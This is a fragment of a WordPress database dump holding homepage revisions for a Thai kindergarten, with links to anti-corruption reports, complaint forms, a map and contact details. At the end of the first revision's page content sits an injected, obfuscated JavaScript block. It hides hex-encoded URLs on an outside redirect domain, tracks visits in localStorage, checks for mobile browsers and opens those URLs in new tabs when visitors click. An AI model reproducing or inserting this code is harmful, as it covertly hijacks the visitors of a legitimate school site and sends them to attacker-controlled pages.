gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 17:11:20','2025-07-15 10:11:20','',19,'http://watprato.ssk.in.th/?p=725',0,'revision','',0),
(726,1,'2025-07-15 17:11:58','2025-07-15 10:11:58','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- 